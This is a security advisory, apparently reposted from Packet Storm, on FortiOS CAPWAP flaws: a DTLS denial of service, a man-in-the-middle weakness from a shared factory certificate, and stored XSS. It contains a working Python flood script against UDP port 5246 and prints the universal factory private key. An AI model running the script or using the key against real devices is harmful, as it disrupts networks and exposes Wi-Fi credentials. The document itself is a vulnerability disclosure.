Fortinet FortiOS Denial Of Service / Man-In-The-Middle

2015-01-29T00:00:00
ID PACKETSTORM:130161
Type packetstorm
Reporter Denis Andzakovic
Modified 2015-01-29T00:00:00

Description

                                        
                                            `( , ) (,  
. '.' ) ('. ',  
). , ('. ( ) (  
(_,) .'), ) _ _,  
/ _____/ / _ \ ____ ____ _____  
\____ \==/ /_\ \ _/ ___\/ _ \ / \  
/ \/ | \\ \__( <_> ) Y Y \  
/______ /\___|__ / \___ >____/|__|_| /  
\/ \/.-. \/ \/:wq  
(x.0)  
'=.|w|.='  
_=''"''=.  
  
presents..  
  
Fortinet FortiOS Multiple Vulnerabilities  
Affected Versions: Verified on FortiOS Firmware v5.0,build4457 (GA Patch 7)  
  
PDF:  
http://www.security-assessment.com/files/documents/advisory/Fortinet_FortiOS_Multiple_Vulnerabilities.pdf  
  
+-------------+  
| Description |  
+-------------+  
This advisory details multiple vulnerabilities found within the Fortinet  
FortiOS software. FortiOS is a security-hardened, purpose-built Operating  
System that is the foundation of all FortiGate network security platforms.  
  
A denial of service vulnerability was discovered within the CAPWAP Daemon,  
allowing an attacker to lock the CAPWAP Access Controller. This was achieved  
by sending recurring DTLS messages to the daemon. The CAPWAP daemon itself was  
found to suffer from a Man-In-The-Middle vulnerability, due to the nature of  
Fortinet’s certificate practices. A Stored Cross Site Scripting vulnerability  
was also discovered, allowing an attacker to send a crafted CAPWAP join  
request containing malicious JavaScript code. This code is subsequently  
rendered in the FortiOS administrative console.  
  
+--------------+  
| Exploitation |  
+--------------+  
  
--[ CAPWAP Daemon DTLS Denial of Service Vulnerability  
  
During the DTLS session establishment, the protocol implements a  
‘HelloVerifyRequest’ send back to the client in response to the initial  
‘ClientHello’. The client is then required to send a ‘ClientHello’ with a  
specific cookie provided in the ‘HelloVerifyRequest’. This is designed to  
protect against Denial of Service attacks. It was discovered that, even though  
the Fortinet DTLS server implements this, sending a number of initial  
‘ClientHello’ requests in short succession creates a denial of service  
condition on the FortiOS device.  
  
The number of requests required to trigger the condition was found to be  
dependent on the specifications of the machine running FortiOS, however this  
was tested against a mid-range Fortigate device and successfully caused a  
Denial of Service condition with as little as ten requests.  
  
The following POC code can be used to replicate this vulnerability:  
  
#!/usr/bin/python  
#  
# FortiOS CAPWAP Control Denial Of Service POC  
#   
# This exploit will trigger a denial of service  
# condition on the FortiOS CAPWAP Control Daemon  
# by sending recurring DTLS Client Hello   
# messages.  
#  
# Author: Denis Andzakovic  
# Date: 19/08/2014  
#  
  
import socket   
import os  
import time  
from struct import pack  
import binascii  
import argparse  
  
# Grab parameters from command line  
parser = argparse.ArgumentParser(description='FortiOS CAPWAP Control Server - DTLS Client Hello DOS')  
parser.add_argument('-d','--host', help="IP Address of the host to attack", required=True)  
args = parser.parse_args()  
  
randombytes = os.urandom(28)  
capwapreamble = "\x01\x00\x00\x00"  
hello = "\x16" + "\xfe\xff" + "\x00"*8 #handshake id, version, epoch and seq  
handshakeProtocol = "\x01" + "\x00\x00\x2c" + "\x00"*6 + "\x00\x2c" + "\xfe\xff" + pack(">i",int(time.time())) + randombytes + "\x00" + "\x00" + "\x00\x04" + "\x00\x2f\x00\x0a\x01\x00"  
  
while True:  
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
sock.sendto(capwapreamble + hello + pack(">H",len(handshakeProtocol)) + handshakeProtocol, (args.host, 5246))  
resp, senderaddr = sock.recvfrom(4098)  
  
cookie = resp[31:]  
print "[+] Got response. Cookie: " + binascii.hexlify(cookie)  
  
--[ DTLS Man-In-The-Middle Vulnerability  
  
Fortinet devices were found to use DTLS for the CAPWAP control protocol, with  
the CAPWAP data protocol being cleartext by default. The CAPWAP DTLS protocol  
was found to use a universal ‘Fortinet_Factory’ certificate and private key,  
the certificate authority for which is static across all Fortinet devices. A  
method for replacing this certificate was not found.  
  
By harvesting this certificate and key, an attacker may stage Man in the  
Middle attacks against any Fortinet device using the CAPWAP DTLS protocol.  
This allows for the retrieval of sensitive information such as wireless SSIDs  
and WPA passphrases. The two files, ‘Fortinet_Factory.cer’ and  
‘Fortinet_Factory.key’ can be found in the /etc/cert/local directory on  
Fortinet devices.  
  
The following details the ‘Fortinet_Factory’ certificate and private  
key. By using the following certificate an attacker may stage  
Man in the Middle attacks against any Fortinet access point or wireless  
controller implementing the CAPWAP Control protocol globally.  
  
-----BEGIN CERTIFICATE-----  
MIIDRTCCAi2gAwIBAgIDAN9yMA0GCSqGSIb3DQEBBQUAMIGgMQswCQYDVQQGEwJV  
UzETMBEGA1UECBMKQ2FsaWZvcm5pYTESMBAGA1UEBxMJU3Vubnl2YWxlMREwDwYD  
VQQKEwhGb3J0aW5ldDEeMBwGA1UECxMVQ2VydGlmaWNhdGUgQXV0aG9yaXR5MRAw  
DgYDVQQDEwdzdXBwb3J0MSMwIQYJKoZIhvcNAQkBFhRzdXBwb3J0QGZvcnRpbmV0  
LmNvbTAeFw0xMTA1MjYyMzExMDVaFw0zODAxMTkwMzE0MDdaMIGdMQswCQYDVQQG  
EwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTESMBAGA1UEBxMJU3Vubnl2YWxlMREw  
DwYDVQQKEwhGb3J0aW5ldDESMBAGA1UECxMJRm9ydGlHYXRlMRkwFwYDVQQDExBG  
VzYwQ0EzOTExMDAwMTA0MSMwIQYJKoZIhvcNAQkBFhRzdXBwb3J0QGZvcnRpbmV0  
LmNvbTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAxDcSsvApqw3AsPg4T/MX  
eZrE2Vhj3DOGM5JNiOyp1YIt4Q0xVYB+1B3SKFEmkwjYJoMR0Q8sFnbblA81FRGR  
sQVxRY+DPdJne+hTVbQ93BIhMGtNAoBYwygU6/JC1e3deB2XfgkBW70Esg12ghu2  
lmTHOWrIMGgW+DnIGvsuYlkCAwEAAaMNMAswCQYDVR0TBAIwADANBgkqhkiG9w0B  
AQUFAAOCAQEAJtQ9XkyjPH9IoS9qRdxfrkvvn6MbikvPVc3IYa8eS69Etj3vlRVf  
GEbEvNnYHBmT7ur77goa21ozqnfmImAstW3QOINkF/FX6VHbHlvywDJEortqEVgT  
DlOCKPV4z91t4Yf3/v0LYmHEF056TqU5nXt3ipTTNeFgANdKCMj4mT1KG9U9XfoK  
aAmcoe2JDGUj9W+5P0WMVcCth5mIJ5xy1UkEvWlG2p/p1Yw3fmbNkN5SJViy/Gug  
yznUXeBwmQEwupwq1ZfAcXQyxTiW7DHhMXnXis0tSJlOLFQAtAs83V5Ox8MSmGE7  
M94eb9JOP8cvH2bW6LW7egB/Bwrp4N421Q==  
-----END CERTIFICATE-----  
  
-----BEGIN RSA PRIVATE KEY-----  
MIICXAIBAAKBgQDENxKy8CmrDcCw+DhP8xd5msTZWGPcM4Yzkk2I7KnVgi3hDTFV  
gH7UHdIoUSaTCNgmgxHRDywWdtuUDzUVEZGxBXFFj4M90md76FNVtD3cEiEwa00C  
gFjDKBTr8kLV7d14HZd+CQFbvQSyDXaCG7aWZMc5asgwaBb4Ocga+y5iWQIDAQAB  
AoGAfV8/KGyCA1T3QVxpBtSptD6q9sEelW2qmzspJYsqfUz/qaP3WM2QvFINnUs0  
3ZAyJHFtKeqK3hO1+6W34i1mq9lgAll7KMbAuxxmY8U87zskv9YUP46dONt+ondn  
nVf5OxrPTH3Zkom1CEh110BUI4hD+rEqYi+twZF5FuAXVd0CQQDv0FYVO4NMzEL+  
leLvkbd+ODUTvm9rET+mxtx719DJ3JL9T7jiunPsDY/0dpGkVSyLGQg6tO2YsgrE  
/Vz79iO3AkEA0XVo1RkmFpoE0EZHMzkzjJFmoLEAYtLPvcg4IP6bIuAHWt54cxFB  
/mpN4QlhVm0+awMPH3PNWjTJ9EDFp+5KbwJACu8IvbcU6W92rnzO9/VA1HRjlx7b  
nZoPuN7gNpVEY6+20+3KlCvEFUMZCSBOy5tGiKD/iw2st4WGkCytDJ/QSQJBAJqq  
cNuSM27TEiTdECxB28+7eiXELb3LXv0LgG7UsqeA981go16Mase7pYA7VfXkuwd3  
/c3Cy+sFOe8zeQB0098CQFmiDnhpV37FtUzDXkKC5a9Vc950wK9/V9vHHwFIiO6K  
0+GoDb6b2HmHGvIpBmw55isanRDlC1x1EpRKw/3F0+4=  
-----END RSA PRIVATE KEY-----  
  
  
--[ Stored Cross Site Scripting Vulnerability  
  
By sending a crafted CAPWAP Join packet, a malicious entity may stage Cross  
Site Scripting attacks against legitimate administrative users. This is  
achieved by inserting malicious JavaScript code into the WTP Name or WTP  
Active Software Version fields within the CAPWAP Join request. The WTP Active  
Software Version field is a child parameter of the WTP Descriptor message  
element.  
  
+----------+  
| Solution |  
+----------+  
There is no official solution for these issues. All Access Controller to  
Wireless Termination Point (and vice-versa) traffic is recommended to be kept  
on a secure network and rigorously firewalled to reduce the exploitability of  
these vulnerabilities.  
  
+---------------------+  
| Disclosure Timeline |  
+---------------------+  
08/10/2014 - Initial email sent to Fortinet PSIRT team.  
09/10/2014 - Advisory documents sent to Fortinet.  
15/10/2014 - Acknowledgement of advisories from Fortinet.  
16/10/2014 - Update requested from Fortinet.  
02/12/2014 - Update requested from Fortinet.  
13/12/2014 - Update requested from Fortinet.  
29/01/2015 - Advisory Release.  
  
+-------------------------------+  
| About Security-Assessment.com |  
+-------------------------------+  
  
Security-Assessment.com is Australasia's leading team of Information Security  
consultants specialising in providing high quality Information Security   
services to clients throughout the Asia Pacific region. Our clients include  
some of the largest globally recognised companies in areas such as finance,  
telecommunications, broadcasting, legal and government. Our aim is to provide  
the very best independent advice and a high level of technical expertise while  
creating long and lasting professional relationships with our clients.  
  
Security-Assessment.com is committed to security research and development,  
and its team continues to identify and responsibly publish vulnerabilities  
in public and private software vendor's products. Members of the   
Security-Assessment.com R&D team are globally recognised through their release  
of whitepapers and presentations related to new security research.  
  
For further information on this issue or any of our service offerings,   
contact us:  
  
Web www.security-assessment.com  
Email info () security-assessment com  
Phone +64 4 470 1650  
  
  
  
  
  
`